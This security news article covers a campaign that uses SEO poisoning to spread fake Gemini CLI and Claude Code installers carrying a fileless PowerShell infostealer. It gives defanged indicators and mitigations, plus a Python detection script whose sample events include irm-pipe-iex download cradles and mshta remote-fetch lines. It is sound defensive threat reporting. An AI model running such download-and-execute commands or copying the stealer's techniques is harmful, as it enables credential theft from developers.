GBHackers

Hackers Use SEO Poisoning to Fake Gemini CLI, Claude Installers


Financially motivated threat actors are running an active campaign that impersonates Google’s Gemini CLI and Anthropic’s Claude Code, using SEO poisoning to deliver a fileless PowerShell infostealer to developer workstations worldwide.

First identified in early March 2026 by EclecticIQ researchers, the campaign represents a calculated escalation in supply-chain-focused eCrime targeting AI developer tooling.

The infection begins with a routine developer web search. Attackers use black-hat SEO techniques, including keyword stuffing, private link networks, and artificial click inflation, to surface attacker-controlled domains above legitimate vendor results.

SEO Poisoning to Impersonate

Victims searching for “Gemini CLI” land on the typosquatted domain geminicli[.]co[.]com, while Claude Code users are redirected to claudecode[.]co[.]com, both registered to leverage the .co.com suffix to appear legitimate.

Impersonation of Gemini CLI installation page. (Source: eclecticiq)

A separate but overlapping campaign tracked by researchers, dubbed InstallFix, distributed near-identical fake Claude Code installation pages exclusively through Google Ads sponsored results, meaning attackers paid to appear at the top of search results.

Researchers confirmed attacks against government, electronics, education, and food and beverage sectors across the Americas, Asia-Pacific, Europe, and AMEA.

The social engineering lure is disarmingly simple: a visually cloned installation page instructs the developer to paste a single PowerShell command into their terminal. What makes this technique effective is the first-stage script’s simultaneous dual execution, EclecticIQ said.

While a concealed Shell.Application COM object silently fetches and memory-executes the second-stage infostealer from gemini-setup[.]c[.]com via irm | iex, the same script runs the legitimate npm install -g @google/gemini-cli in the terminal the victim is watching.

For the Claude Code variant, EclecticIQ telemetry observed mshta.exe being invoked against download-version[.]1-5-8[.]com, fetching a ZIP/HTA polyglot file (claude.msixbundle) that contained genuine Microsoft Bing packages bearing valid signatures alongside an appended malicious HTA payload, a dual-format structure specifically designed to evade static detection.

The second-stage PowerShell payload immediately disables Event Tracing for Windows (ETW) and bypasses AMSI before initiating collection.

A ~6,800-line obfuscated script with an anti-sandbox qemu-ga check then harvests credentials across a broad surface: Chrome, Edge, Brave, and Firefox login data; session tokens from Slack, Teams, Discord, Zoom, and Telegram; WinSCP, PuTTY, and OpenVPN configurations; cloud-synced directories from OneDrive, Google Drive, MEGA, and Proton Drive; and OAuth tokens, SSH keys, and CI/CD credentials.

Stolen session cookies from collaboration platforms bypass MFA entirely, feeding the access broker market with immediate resale value.

EclecticIQ’s passive DNS pivot from the campaign’s bulletproof host at 109.107.170[.]111 (Netherlands-based MIRhosting) uncovered a cluster of 30+ domains also impersonating Node.js, Chocolatey, KeePassXC, and Monero, indicating the threat actor rotates only the lure brand and C2 hostname.

Pivoted domains from AI impersonation campaign (Source: eclecticiq)

The campaign appears geographically focused on the United States and United Kingdom based on observed .us.com, .us.org, and .co.uk TLD patterns.

Indicators of Compromise

Indicator                        | Type                | Source
geminicli[.]co[.]com             | Lure domain         | EclecticIQ
gemini-setup[.]com               | Payload host        | EclecticIQ
events[.]msft23[.]com            | Gemini C2           | EclecticIQ
claudecode[.]co[.]com            | Lure domain         | EclecticIQ / Push Security
claude-setup[.]com               | Payload host        | EclecticIQ
events[.]ms709[.]com             | Claude C2           | EclecticIQ
download-version[.]1-5-8[.]com   | Payload host        | Trend Micro
oakenfjrod[.]ru                  | Stage-4 C2          | Trend Micro
109.107.170[.]111                | Bulletproof host IP | EclecticIQ

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Security teams should hunt for irm | iex download cradle patterns in command-line telemetry and alert on powershell.exe spawned with -WindowStyle Hidden.
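As an added illustration of that hunt (not code from the EclecticIQ report or from GBHackers), the Python below applies those command-line patterns, plus the mshta.exe and Shell.Application behaviours described above, to a few constructed process-creation and script-block events; the PLACEHOLDER.example hostnames are made up.

```python
import re

# Constructed telemetry records for illustration only (Sysmon Event ID 1 command
# lines and PowerShell Event ID 4104 script-block text); none are real captures.
SAMPLE_EVENTS = [
    {"source": "process_create",
     "text": r'powershell.exe -NoProfile -WindowStyle Hidden -c "irm https://PLACEHOLDER.example/s.ps1 | iex"'},
    {"source": "process_create",
     "text": r'''powershell.exe -c "Invoke-RestMethod 'https://PLACEHOLDER.example/x' | Invoke-Expression"'''},
    {"source": "process_create",
     "text": r"mshta.exe https://PLACEHOLDER.example/claude.msixbundle"},
    {"source": "script_block",
     "text": r"$app = New-Object -ComObject Shell.Application"},
    {"source": "process_create",
     "text": r'powershell.exe -c "npm install -g @google/gemini-cli"'},  # benign install
    {"source": "process_create",
     "text": r"node C:\Users\dev\project\index.js"},                    # benign
]

# (rule name, compiled regex). All matching is case-insensitive because PowerShell is.
RULES = [
    # irm/iwr (or the long cmdlet names) piped into iex / Invoke-Expression
    ("download_cradle", re.compile(
        r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b[^|]*\|\s*(iex|Invoke-Expression)\b", re.I)),
    # -WindowStyle Hidden and its short forms (-w h, -w hidden)
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)),
    # mshta.exe launched with a remote URL argument
    ("mshta_remote", re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I)),
    # Shell.Application COM object instantiation in script text
    ("shell_application_com", re.compile(r"Shell\.Application", re.I)),
]


def match_rules(text):
    """Return the names of every rule whose pattern occurs in the given text."""
    return [name for name, rx in RULES if rx.search(text)]


def triage(events):
    """Return (source, text, matched rules) for each event that hits at least one rule."""
    hits = []
    for ev in events:
        matched = match_rules(ev["text"])
        if matched:
            hits.append((ev["source"], ev["text"], matched))
    return hits


if __name__ == "__main__":
    for source, text, matched in triage(SAMPLE_EVENTS):
        print(f"[{source}] {matched}: {text}")
```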

Organizations should enforce PowerShell Constrained Language Mode via WDAC or AppLocker, deploy FIDO2 keys for privileged developer accounts, and configure browser policies to prevent clipboard write access on untrusted sites.

Developer awareness training addressing paste-and-execute social engineering, particularly for AI tool installation workflows, is the most immediate preventive control available.
